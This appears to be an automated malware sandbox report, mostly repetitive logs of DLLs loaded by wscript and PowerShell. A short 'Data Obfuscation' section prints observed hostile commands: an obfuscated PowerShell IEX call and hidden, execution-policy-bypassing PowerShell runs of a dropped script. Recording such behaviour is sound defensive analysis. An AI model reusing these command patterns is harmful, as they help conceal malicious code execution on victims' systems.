            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121", "0", "true");
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00F57DA0 push eax; iretd 12_2_00F57DA1
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
